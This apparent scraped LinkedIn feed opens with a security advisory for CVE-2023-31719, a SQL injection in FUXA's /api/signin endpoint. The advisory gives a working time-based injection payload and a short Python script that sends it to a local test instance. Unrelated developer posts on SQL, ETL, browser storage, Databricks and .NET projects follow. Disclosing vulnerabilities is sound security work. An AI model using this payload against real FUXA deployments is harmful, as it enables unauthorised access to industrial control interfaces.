API ThreatStats
High CVE-2023-31719: FUXA SQL Injection Vulnerability
It's possible to inject SQL code into the JSON parameter "username" of the /api/signin endpoint via an HTTP POST request:
{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}
CVSSv3.1 Base Score: 8.2
https://lnkd.in/dmSyEjyT
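A minimal sketch of how such a probe could be reproduced against a local test instance (the target URL, port, and the use of Python's requests library are assumptions for illustration, not part of the advisory):

```python
# Hypothetical reproduction sketch; point it only at a test instance you own.
import requests

payload = {
    "username": ("test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),"
                 "UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj"),
    "password": "test",
}

# If the endpoint concatenates "username" into its SQL, the expensive
# RANDOMBLOB/HEX expression makes the response measurably slower.
resp = requests.post("http://localhost:1881/api/signin", json=payload, timeout=60)
print(resp.status_code, resp.elapsed.total_seconds())
```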
More Relevant Posts
-
Hussein Elghareb
Jr. .NET Backend Developer @Ertaqy | DEPI Trainee
#100DayOfDotNet #Day31 #Day32 #Day33
🔹 How to send extra data to the view
🔹 ViewData, ViewBag
🔹 ViewModel
🔹 When to use a ViewModel
🔹 State management
🔸🔸 Session, TempData, Cookie
🔹 TempData methods
🔸🔸 Load, Save, Keep, Peek
🔹 TempData lifetime
🔹 Session variables
🔹 Setting a time for the session
🔹 Cookie
🔹 Cookie types
🔸🔸 Session and Persistent cookies
GitHub Repo: [https://lnkd.in/djch5F_G]
#Csharp #OOP #Database #MicrosoftSQLServer #SQLServer #LINQ #WinForms #DevExpress #ORM #ADO #Dapper #EntityFrameworkCore #ASPDotNetMVCCore #MVC #DotNet #ASP.Net #SelfStudy
-
Akash Christopher
Data Insights Professional | Python, SQL, Power BI, Azure Data Engineering | Proven Experience in BI & Analytics Development, Data Integration, and Data Science | Microsoft Fabric
Start with these building blocks to revisit and practice SQL essentials!
• DDL (Data Definition Language)
  o CREATE Table
  o ALTER Table
  o DROP Table
  o TRUNCATE Table
• DML (Data Manipulation Language)
  o INSERT
  o UPDATE
  o DELETE
• DCL (Data Control Language)
  o GRANT
  o REVOKE
• TCL (Transaction Control Language)
  o COMMIT
  o ROLLBACK
  o SAVEPOINT
• DQL (Data Query Language)
  o SELECT
• Different SELECT query functionalities
  o SQL operators: logical, comparison, arithmetic
  o CASE statement
  o Two ways of writing SQL queries: using a comma separator, using JOIN
  o UNION & UNION ALL operators
  o GROUP BY statement with the HAVING clause
  o Subqueries
  o Aggregate functions: COUNT, AVG, MIN, MAX, SUM
• SQL JOINs
  o INNER JOIN
  o OUTER JOIN: LEFT OUTER JOIN, RIGHT OUTER JOIN, FULL OUTER JOIN
Revisiting and practicing these essential SQL concepts to strengthen my skills! Check out my practice queries on GitHub: https://lnkd.in/gBjv7ZGa
#SQL #DatabaseManagement
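For hands-on revision, most of these categories can be exercised in one sitting with Python's built-in sqlite3 module as a scratch engine (the table names below are made up, and SQLite has no GRANT/REVOKE, so DCL is the one category it can't demonstrate):

```python
import sqlite3

conn = sqlite3.connect(":memory:")   # throwaway database for practice
cur = conn.cursor()

# DDL: CREATE
cur.execute("CREATE TABLE dept (id INTEGER PRIMARY KEY, name TEXT)")
cur.execute("CREATE TABLE emp (id INTEGER PRIMARY KEY, name TEXT, dept_id INTEGER)")

# DML inside a transaction (TCL: COMMIT / ROLLBACK)
cur.execute("INSERT INTO dept (id, name) VALUES (1, 'Analytics')")
cur.executemany("INSERT INTO emp (id, name, dept_id) VALUES (?, ?, ?)",
                [(1, 'Ana', 1), (2, 'Raj', None)])
conn.commit()

# DQL: SELECT with an OUTER JOIN, GROUP BY, and an aggregate function
cur.execute("""
    SELECT d.name, COUNT(e.id) AS headcount
    FROM dept AS d
    LEFT OUTER JOIN emp AS e ON e.dept_id = d.id
    GROUP BY d.name
""")
print(cur.fetchall())   # [('Analytics', 1)]
conn.close()
```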
-
Mohamed Eldeeb
Data Engineer & ML enthusiast
My first ETL data pipeline for extracting financial data from various sources like websites, APIs, and files provided by financial analysis firms. After collecting the data, we extract the data of interest and transform it based on the given requirements. Once the transformation is complete, we load that data into a single CSV file.
Project tasks:
- Collect data from the Exchange Rate-API by making HTTP requests to some of its endpoints.
- Collect data via web scraping, parsing the HTML with BeautifulSoup.
- Download and save the collected data into different files to be processed.
- Read/parse CSV, XML, and JSON file types.
- Extract data from these file types.
- Transform the data based on the given requirements.
- Load/save the transformed data in a ready-to-load format.
- Build a logging module that saves logging info into a `logs.txt` file.
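A condensed sketch of that extract, transform, and load flow; all URLs, selectors, and column names below are placeholders rather than the project's actual sources:

```python
# Sketch of the described extract -> transform -> load flow, with logging to logs.txt.
# All URLs, selectors, and field names are placeholders.
import csv
import logging
import requests
from bs4 import BeautifulSoup

logging.basicConfig(filename="logs.txt", level=logging.INFO,
                    format="%(asctime)s %(message)s")

def extract():
    logging.info("Extract phase started")
    rates = requests.get("https://api.example.com/v6/latest/USD", timeout=10).json()
    html = requests.get("https://example.com/largest-banks", timeout=10).text
    rows = [[td.get_text(strip=True) for td in tr.find_all("td")]
            for tr in BeautifulSoup(html, "html.parser").find_all("tr")]
    logging.info("Extract phase ended")
    return rates, rows

def transform(rates, rows):
    logging.info("Transform phase started")
    gbp = rates.get("rates", {}).get("GBP", 1.0)
    records = []
    for row in rows:
        # keep two-column rows (name, market cap in USD) and add a GBP column
        if len(row) == 2 and row[1].replace(".", "", 1).isdigit():
            name, usd = row
            records.append([name, usd, round(float(usd) * gbp, 2)])
    logging.info("Transform phase ended")
    return records

def load(records, path="transformed.csv"):
    logging.info("Load phase started")
    with open(path, "w", newline="") as f:
        writer = csv.writer(f)
        writer.writerow(["name", "cap_usd", "cap_gbp"])
        writer.writerows(records)
    logging.info("Load phase ended")

if __name__ == "__main__":
    load(transform(*extract()))
```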
-
Abhishek Kumar
Full Stack Developer (React.js, Node.js, Express, MongoDB)
🚫🛑 Stop Using localStorage! 🛑🚫
👋 Folks, no clickbait here – just a straightforward message: "Stop Using localStorage!" It's outdated for modern apps. Let's break it down. ⏬
🔵 localStorage's Origin (2009)
Introduced as a 5MB string-based storage. Never meant as the end-all solution for browser storage.
🔵 Issues with localStorage
- One data type: only stores strings. Complex data? Serialize and deserialize.
- Slow performance: not ideal for apps needing quick data transactions.
- Limited space: max 5MB of storage.
- Serialization troubles: easy to introduce bugs, especially for new devs.
- Blocking operations: slows down your app. No async support – a big no for smooth mobile experiences.
🔵 The Fall of WebSQL
A simple SQL database for the web. Dropped due to single-vendor implementation, no W3C standardization, competition with IndexedDB, and security concerns.
🔵 Cookies' Limitations
Created in 1994, they're ancient! Only 4KB per domain, sent with every HTTP request, security risks, expiration issues, and increased latency.
🔵 Why IndexedDB?
- Performance: async operations = no blocking.
- More space: a much larger storage quota than localStorage.
- Reliability: avoids common data issues and uses the structuredClone algorithm for integrity.
🔵 But IndexedDB Isn't Perfect...
Not user-friendly. Most libraries focus on versioning, which you might not need.
🔵 Solution: db64 Library
Focuses on IndexedDB's essential features. Avoids bloat from oversized libraries. Check it out here: https://lnkd.in/dMGWn34X
🔵 Conclusion
localStorage is outdated. IndexedDB offers speed, reliability, and flexibility, especially with wrapper libraries.
#webdevelopment #javascript #IndexedDB #storagesolutions
-
Stephen Curran
Astrophysicist | Data Analyst | Data Scientist | Research Project Leader | Team Leader | Researcher | Teacher | Public Speaker | Science Communicator | Scientific Consultant
Here's a shell script to convert an SQL file to CSVs (one for each table). Especially useful when running into errors like "Parse error: file is not a database" and not wanting to take out an online subscription.
https://lnkd.in/gHsPspxx
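When the dump is plain SQL text rather than a binary SQLite file (which is exactly when sqlite3 complains "file is not a database"), a similar conversion can also be sketched in Python with only the standard library. The file names below are placeholders, and the dump has to use SQLite-compatible syntax; this is an alternative sketch, not the shell script linked above:

```python
# Replay a plain-text SQL dump into an in-memory SQLite database,
# then write one CSV per table. File names are placeholders.
import csv
import sqlite3

conn = sqlite3.connect(":memory:")
with open("dump.sql", encoding="utf-8") as f:
    conn.executescript(f.read())          # run the CREATE/INSERT statements

tables = [row[0] for row in conn.execute(
    "SELECT name FROM sqlite_master WHERE type = 'table'")]

for table in tables:
    cur = conn.execute(f'SELECT * FROM "{table}"')
    with open(f"{table}.csv", "w", newline="", encoding="utf-8") as out:
        writer = csv.writer(out)
        writer.writerow([col[0] for col in cur.description])   # header row
        writer.writerows(cur)
```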
-
Ajai S
| Fresher | Looking for Data Analyst jobs with experience in | Databricks | PySpark | AWS services like S3 | Hadoop and Spark.
#dataengineering
1. READING AND WRITING DIFFERENT FILE FORMATS
Databricks can read data from and write data to a variety of formats such as CSV, JSON, Parquet, Avro, and xlsx (Excel). In this notebook we are going to see how to read and write these formats. Some of the common file formats:
CSV FILE FORMAT
Comma-separated values (CSV) is a text file format that uses commas to separate values. A CSV file stores tabular data (numbers and text) in plain text, where each line of the file typically represents one data record. Each record consists of the same number of fields, separated by commas.
JSON FILE FORMAT
JavaScript Object Notation (JSON) is a standard text-based format for representing structured data based on JavaScript object syntax. It is commonly used for transmitting data in web applications (e.g., sending data from the server to the client so it can be displayed on a web page, or vice versa).
PARQUET FILE FORMAT
Parquet is an open-source, column-oriented data file format designed for efficient data storage and retrieval. It provides efficient data compression and encoding schemes with enhanced performance to handle complex data in bulk.
AVRO FILE FORMAT
Avro stores the data definition in JSON format, making it easy to read and interpret; the data itself is stored in binary format, making it compact and efficient. Avro files include markers that can be used to split large data sets into subsets suitable for Apache MapReduce processing.
Link - https://lnkd.in/dfChk4FW
Link - https://lnkd.in/guF6XT3j
#databricks #spark #pyspark #python #mysql #parquet #json #csv #jobsearch #github #jobseeker #jobhunting #hireme #careers
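Assuming a Databricks or PySpark environment, reading and writing all of these formats goes through the same DataFrameReader/DataFrameWriter API. The paths below are placeholders, and Avro (like Excel) depends on the packages available on the cluster:

```python
# Reading common formats with the Spark DataFrame API.
# Paths are placeholders; `spark` is the session a Databricks notebook provides.
df_csv  = (spark.read.option("header", "true")
                     .option("inferSchema", "true")
                     .csv("/data/in/sales.csv"))
df_json = spark.read.json("/data/in/events.json")
df_parq = spark.read.parquet("/data/in/metrics.parquet")
df_avro = spark.read.format("avro").load("/data/in/logs.avro")  # needs spark-avro

# Writing back out: Parquet keeps the schema and compresses well.
df_csv.write.mode("overwrite").parquet("/data/out/sales_parquet")
df_json.write.mode("overwrite").option("header", "true").csv("/data/out/events_csv")
```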
-
Abdulwaisa Al Nuaimi
Software Developer | Junior .NET Developer | Full Stack Developer
GenericController.Api is an extensible ASP.NET Core Web API designed to streamline the implementation of CRUD operations for various entities. This project leverages a generic repository pattern and a base controller, minimizing boilerplate code and enhancing code reuse. It's ideal for developers seeking a robust and maintainable architecture for managing different types of data models.
https://lnkd.in/dMDwCr5E
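The project itself is C#/ASP.NET Core, but the generic-repository idea it builds on can be sketched in a few lines of Python for readers outside .NET; the class and method names here are illustrative, not the repo's actual API:

```python
# Illustrative generic repository, not the GenericController.Api code itself.
from dataclasses import dataclass
from typing import Dict, Generic, List, Optional, TypeVar

T = TypeVar("T")

class Repository(Generic[T]):
    """One in-memory CRUD implementation reused for every entity type."""
    def __init__(self) -> None:
        self._items: Dict[int, T] = {}
        self._next_id = 1

    def create(self, item: T) -> int:
        self._items[self._next_id] = item
        self._next_id += 1
        return self._next_id - 1

    def get(self, item_id: int) -> Optional[T]:
        return self._items.get(item_id)

    def list(self) -> List[T]:
        return list(self._items.values())

    def delete(self, item_id: int) -> None:
        self._items.pop(item_id, None)

@dataclass
class Product:
    name: str
    price: float

products: Repository[Product] = Repository()
products.create(Product("Keyboard", 49.9))
print(products.list())
```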
-
Julio Cabanillas
Junior Software Developer
🚀 Exciting News! 🚀
I've just released a new GitHub repository for a NodeJS-based web crawler that generates newsletters using the SendGrid and OpenAI APIs. This tool is perfect for anyone looking to automate their news updates and stay informed with the latest trends via web crawling.
Check it out here: https://lnkd.in/dsDnYGrB
Whether you're into tech, security, or just curious, this project is for you. Contributions and feedback are welcome!
#webscraping #webcrawling #newsletter #NodeJS #OpenAI #SendGrid
-
Omar Ahmed
HIS Implementer @Millensys | ITI Graduate.
🚀 Thrilled to unveil our latest project: Bash Shell Script DBMS 📊
Adham Ayman and I have worked together to develop a command-line interface (CLI) based app that empowers users to efficiently store and retrieve data from their hard disks. 🖥️
Key Features:
🔍 CLI menu for user-friendly navigation
✨ Main menu options: Create, List, Connect, and Drop Databases
💽 Submenu for specific database operations: Create, List, Drop Tables, and more
This project not only enhances data management but also provides a seamless user experience. 💡
What it offers:
📂 Create Database: set up your data repository
📋 List Databases: easily track your databases
🔗 Connect to Databases: seamless transition to specific databases
❌ Drop Database: efficient database removal
And, when connected to a specific database:
🗄️ Create/List/Drop Table: manage your tables effortlessly
📥 Insert/Select/Delete/Update Table: fine-tune your data operations
Big shoutout to @AdhamAyman for the fantastic collaboration! Excited about the potential applications and looking forward to your thoughts! Feel free to reach out for more details or a demo. 👩💻👨💻
#DatabaseManagement #ShellScripting #TechInnovation #CLIApp #DataManagement
https://lnkd.in/dwnjuxK2
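The project itself is pure Bash, but the underlying idea, a database as a directory and a table as a delimited file on disk, can be sketched in Python for illustration; the layout and function names below are assumptions, not the project's actual format:

```python
# Conceptual sketch only: databases as directories, tables as delimited files.
# The real project is a Bash CLI; this layout is an assumption for illustration.
import csv
from pathlib import Path

ROOT = Path("dbms_home")
ROOT.mkdir(exist_ok=True)

def create_database(name: str) -> None:
    (ROOT / name).mkdir(exist_ok=True)

def list_databases() -> list:
    return [p.name for p in ROOT.iterdir() if p.is_dir()]

def create_table(db: str, table: str, columns: list) -> None:
    with open(ROOT / db / f"{table}.csv", "w", newline="") as f:
        csv.writer(f).writerow(columns)          # header row acts as the schema

def insert_row(db: str, table: str, row: list) -> None:
    with open(ROOT / db / f"{table}.csv", "a", newline="") as f:
        csv.writer(f).writerow(row)

def select_all(db: str, table: str) -> list:
    with open(ROOT / db / f"{table}.csv", newline="") as f:
        return list(csv.reader(f))
```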
-
Rob Horrocks
SQL Server and Azure SME helping organisations develop and optimise their estate on any platform (On-prem, Cloud, Windows, Linux, K8s) - Former Senior PFE and CSA at Microsoft
Here is an Extended Events loader with a difference. At the moment it is only used to load rpc_completed and sql_batch_completed events into a SQL Server database. However, it will then hash unique batches and generate statistics for them based on Duration, CPU, Logical Reads, Physical Reads, Writes and Rowcount.
Use this tool to load events for a specific time range (e.g. hour, day, week). You can filter to get the exact start and end date/time, and you can filter out noisy sp_reset_connection stored procedure calls.
There is a SQL query and Excel report template to compare the CPU used by all, or a subset, of your stored procedures against a screenshot of the OS and SQL CPU metrics. You can also compare against Query Store Runtime Stats to give an idea of compilation time and client duration.
You can also review the following stats for your batches:
- Min, Mean, Median, Max and Total
- 1st and 3rd Quartile
- 90th, 95th and 99th Percentile
https://lnkd.in/e9W5sjJf
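The batch statistics listed above are standard summary aggregates; computed over a list of batch durations they would look roughly like the sketch below (numpy and the sample values are for illustration only, the tool itself produces these figures inside SQL Server):

```python
# Illustration of the summary statistics described above, computed over
# a small made-up list of batch durations (microseconds).
import numpy as np

durations = np.array([1200, 1350, 980, 15000, 2100, 1800, 990, 1100])

stats = {
    "min": durations.min(),
    "mean": durations.mean(),
    "median": np.median(durations),
    "max": durations.max(),
    "total": durations.sum(),
    "q1": np.percentile(durations, 25),
    "q3": np.percentile(durations, 75),
    "p90": np.percentile(durations, 90),
    "p95": np.percentile(durations, 95),
    "p99": np.percentile(durations, 99),
}
print(stats)
```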